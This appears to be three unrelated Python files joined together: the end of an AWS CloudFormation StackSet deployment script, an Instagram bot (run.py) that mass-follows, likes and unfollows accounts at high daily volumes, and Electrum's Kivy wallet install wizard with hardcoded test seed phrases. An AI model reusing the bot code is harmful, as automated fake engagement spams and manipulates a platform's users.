print(f"\033[2K\033[1GStack {stack} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def add_stack_to_stackset(client, stackset, accounts, regions):
"""
Function that updates a stackset defined in the parameters
:stackset: The stackset name
:regions: parameters to be passed to the stackset
:return: True or False
"""
print(f"Adding stacks to StackSet {stackset} ", end="")
response = client.describe_stack_set(StackSetName=stackset)
if response['StackSet']['Status'] not in ('ACTIVE'):
print(f"Cannot add stacks to stackset {stackset}. Current stackset status is : {response['StackSet']['Status']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
filter=[{
'Name': 'DETAILED_STATUS',
'Values': 'PENDING'
}]
response = client.list_stack_instances(StackSetName=stackset,Filters=filter)
while(len(response['Summaries']) > 0):
time.sleep(1)
response = client.list_stack_instances(StackSetName=stackset,Filters=filter)
try:
operationPreferences={
'RegionConcurrencyType': 'PARALLEL',
'FailureToleranceCount': 9,
'MaxConcurrentCount': 10,
}
client.create_stack_instances(
StackSetName=stackset,
Regions=regions,
Accounts=accounts,
OperationPreferences=operationPreferences
)
time.sleep(10)
response = client.list_stack_set_operations(StackSetName=stackset)
while(any(x['Status'] == "RUNNING" for x in response['Summaries'])):
time.sleep(2)
response = client.list_stack_set_operations(StackSetName=stackset)
print(f"\033[2K\033[1GAdding stacks to StackSet {stackset} [{Status.OK.value}]")
return Execution.OK
except ClientError as err:
print(f"\033[2K\033[1GAdding stacks to StackSet {stackset} failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def update_stackset(client, stackset, templates, params=[]):
"""
Function that updates a stackset defined in the parameters
:stackset: The stackset name
:template_data: dict holding CFT details
:params: parameters to be passed to the stackset
:return: True or False
"""
global all_regions_except_ireland
global tags
template = templates[stackset]['Template']
capabilities=[]
print(f"StackSet {stackset} update ", end="")
try:
with open(template, "r") as f:
template_body=f.read()
response = client.describe_stack_set(StackSetName=stackset)
except FileNotFoundError as err:
print(f"\033[2K\033[StackSet template file not found : {err.strerror} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
print(f"\033[2K\033[1GStackSet {stackset} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
if 'Parameters:' in template_body:
if not null_empty(templates[stackset], 'Params'):
try:
with open(templates[stackset]['Params']) as f:
params = json.load(f)
except FileNotFoundError as err:
print(f"\033[2K\033[1GParameter file not found : {err.strerror} [{Status.FAIL.value}]")
Execution.FAIL
except json.decoder.JSONDecodeError as err:
print(f"\033[2K\033[1GParameter file problem : {err.strerror} [{Status.FAIL.value}]")
Execution.FAIL
elif not null_empty(response['StackSet'], 'Parameters'):
params = merge_params(response['StackSet']['Parameters'], params)
if not null_empty(response['StackSet'], 'Capabilities'):
capabilities = response['StackSet']['Capabilities']
if not null_empty(response['StackSet'], 'Tags'):
apply_tags = merge_tags(response['StackSet']['Tags'], tags)
if response['StackSet']['Status'] not in ('ACTIVE'):
print(f"Cannot update stackset {stackset}. Current status is : {response['StackSet']['Status']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
try:
operationPreferences={
'RegionConcurrencyType': 'PARALLEL',
'FailureToleranceCount': 9,
'MaxConcurrentCount': 10,
}
client.update_stack_set(
StackSetName=stackset,
TemplateBody=template_body,
Parameters=validate_params(params, template_body),
Capabilities=capabilities,
OperationPreferences=operationPreferences,
Tags=apply_tags
)
updated=False
while updated == False:
try:
time.sleep(1)
response = client.describe_stack_set(StackSetName=stackset)
if 'ACTIVE' in response['StackSet']['Status'] :
print(f"\033[2K\033[1GStackSet {stackset} update [{Status.OK.value}]")
updated=True
break
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
else:
raise err
return Execution.OK
except ClientError as err:
if err.response['Error']['Code'] == 'AmazonCloudFormationException':
print(f"\033[2K\033[1GStackSet {stackset} not found : {err.response['Error']['Message']} [{Status.FAIL.value}]")
elif err.response['Error']['Code'] == 'ValidationError' and err.response['Error']['Message'] == 'No updates are to be performed.':
print(f"\033[2K\033[1GStackSet {stackset} update [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
else:
print(f"\033[2K\033[1GStackSet {stackset} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
class Execution(Enum):
FAIL = -1
OK = 0
NO_ACTION = 2
class Status(Enum):
FAIL = Fore.RED + "FAIL" + Style.RESET_ALL
OK = Fore.GREEN + "OK" + Style.RESET_ALL
NO_ACTION = Fore.YELLOW + "NO ACTION" + Style.RESET_ALL
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '⠄⠆⠇⠋⠙⠸⠰⠠⠰⠸⠙⠋⠇⠆': yield cursor
def __init__(self, delay=None):
cursor.hide()
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
cursor.show()
if exception is not None:
return False
if __name__ == "__main__":
main(sys.argv[1:])
|
run.py
|
import multiprocessing as mp
from random import choice
from threading import Thread
from time import strftime, sleep
from instabot import Bot
class Start():
def __init__(self, username, password):
self.user_name = username
self.pass_word = password
self.max_follows_per_day = 750
self.bot = Bot(
followed_file='followed/%s_followed.txt' % (username),
whitelist_file='whitelist/%s_whitelist.txt' % (username),
unfollowed_file='unfollowed/%s_unfollowed.txt' % (username),
skipped_file='skipped/%s_skipped.txt' % (username),
max_follows_per_day=self.max_follows_per_day,
max_unfollows_per_day=self.max_follows_per_day,
max_likes_per_day=self.max_follows_per_day / 2,
follow_delay=100,
unfollow_delay=100,
like_delay=500,
comment_delay=350)
self.hashtag_file = self.bot.read_list_from_file('hashtag.txt')
self.recommendations = False
self.users_file = self.bot.read_list_from_file('user.txt')
loggedIn = self.log_in()
if not loggedIn:
raise Exception('Wrong credentials - please check your username and password')
self.run_bot_process()
while True:
sleep(3600)
def run_bot_process(self):
self.run(self.stats)
self.run(self.followUsersFollowers)
self.run(self.likeHashtagMedias)
self.run(self.unfollow_everyday)
def log_in(self):
return self.bot.login(username=self.user_name, password=self.pass_word,
cookie_fname='cookie/%s_cookie.txt' % (self.user_name), use_cookie=False)
@staticmethod
def run(job_fn):
job_thread = Thread(target=job_fn)
job_thread.start()
def stats(self):
while True:
self.bot.save_user_stats(self.user_name, path='stats/')
sleep(6 * 60 * 60)
self.sleepDuringNight()
def followUsersFollowers(self):
thereIsNoError = True
while thereIsNoError:
self.sleepDuringNight()
try:
usersList = self.getRandomUserFollowers()
for user in usersList:
self.bot.follow(user_id=user)
except Exception as exception:
print(exception)
sleep(3600)
def likeHashtagMedias(self):
thereIsNoError = True
numberOfTimesFailed = 0
while thereIsNoError:
self.sleepDuringNight()
try:
hashtag = choice(self.hashtag_file)
hashtagMedias = self.bot.get_hashtag_medias(hashtag)
self.likeMedias(hashtagMedias)
except Exception as exception:
sleep(3600)
print(exception)
numberOfTimesFailed = numberOfTimesFailed + 1
if numberOfTimesFailed >= 5:
break
def likeMedias(self, hashtagMedias):
for media in hashtagMedias:
self.bot.like(media, check_media=False)
def getRandomUserFollowers(self):
randomUser = choice(self.users_file)
if self.recommendations:
userFollowers = self.bot.get_user_followers(
user_id=randomUser, nfollows=1000)
else:
userFollowers = self.bot.get_user_followers(
user_id=randomUser, nfollows=60)
return userFollowers
def sleepDuringNight(self):
currentHour = int(strftime("%H"))
print(currentHour)
sleepFrom = 1
sleepUntil = 5
if sleepFrom <= currentHour <= sleepUntil:
sleepTimeInHours = 0
if currentHour > sleepFrom:
sleepTimeInHours = currentHour - sleepFrom
else:
sleepTimeInHours = sleepUntil - currentHour
sleepTimeInSeconds = sleepTimeInHours * 3600
print('sleeping for %s seconds' % (sleepTimeInSeconds))
sleep(sleepTimeInSeconds)
else:
print('time for sleeping have not yet been met')
def unfollow_everyday(self):
while True:
self.bot.unfollow_everyone()
sleep(3600 * 10)
if __name__ == '__main__':
mp.get_context('spawn')
q = mp.Queue()
print('input username: ')
username = input()
print('input password: ')
password = input()
mp.Process(target=Start, args=([username, password])).start()
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
Widget
size_hint: 1, 1
Label:
id: backup_warning_label
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
opacity: int(m.value != n.value)
text: _("Warning: to be able to restore a multisig wallet, " \
"you should include the master public key for each cosigner " \
"in all of your backups.")
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<SeedDialogHeader@GridLayout>
text: ''
options_dialog: None
rows: 1
orientation: 'horizontal'
size_hint: 1, None
height: self.minimum_height
BigLabel:
size_hint: 9, None
text: root.text
IconButton:
id: options_button
height: '30dp'
width: '30dp'
size_hint: 1, None
icon: 'atlas://electrum/gui/kivy/theming/light/gear'
on_release:
root.options_dialog() if root.options_dialog else None
<RestoreSeedDialog>
message: ''
word: ''
SeedDialogHeader:
id: seed_dialog_header
text: 'ENTER YOUR SEED PHRASE'
options_dialog: root.options_dialog
GridLayout:
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
SeedDialogHeader:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
options_dialog: root.options_dialog
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '48dp'
SeedLabel:
text: root.warning
<ChoiceLineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
SeedLabel:
text: root.message2
TextInput:
id: text_input
multiline: False
size_hint: 1, None
height: '48dp'
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
if key == 27:
if self.wizard.can_go_back():
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None, None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.title = kwargs.get('message', '')
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
self.init_choices(choices)
def init_choices(self, choices):
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message = kwargs.get('message', '')
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class CLButton(ToggleButton):
def on_release(self):
self.root.script_type = self.script_type
self.root.set_text(self.value)
class ChoiceLineDialog(WizardChoiceDialog):
title = StringProperty('')
message1 = StringProperty('')
message2 = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message1 = kwargs.get('message1', '')
self.message2 = kwargs.get('message2', '')
self.choices = kwargs.get('choices', [])
default_choice_idx = kwargs.get('default_choice_idx', 0)
self.ids.next.disabled = False
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for idx, (script_type, title, text) in enumerate(self.choices):
b = CLButton(text=title, height='30dp', group=self.title, allow_no_selection=False)
b.script_type = script_type
b.root = self
b.value = text
layout.add_widget(b)
if idx == default_choice_idx:
b.trigger_action(duration=0)
def set_text(self, value):
self.ids.text_input.text = value
def get_params(self, b):
return (self.ids.text_input.text, self.script_type)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, _):
self.ext = ext
d = SeedOptionsDialog(self.ext, None, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import wordlist as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
self.bip39 = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, bip39):
self.ext = ext
self.bip39 = bip39
self.update_next_button()
d = SeedOptionsDialog(self.ext, self.bip39, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def update_next_button(self):
self.ids.next.disabled = False if self.bip39 else not bool(self._test(self.get_text()))
def on_text(self, dt):
self.update_next_button()
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), self.bip39, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def __init__(self, *args, **kwargs):
RestoreSeedDialog.__init__(self, *args, **kwargs)
self.ids.seed_dialog_header.ids.options_button.disabled = True
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
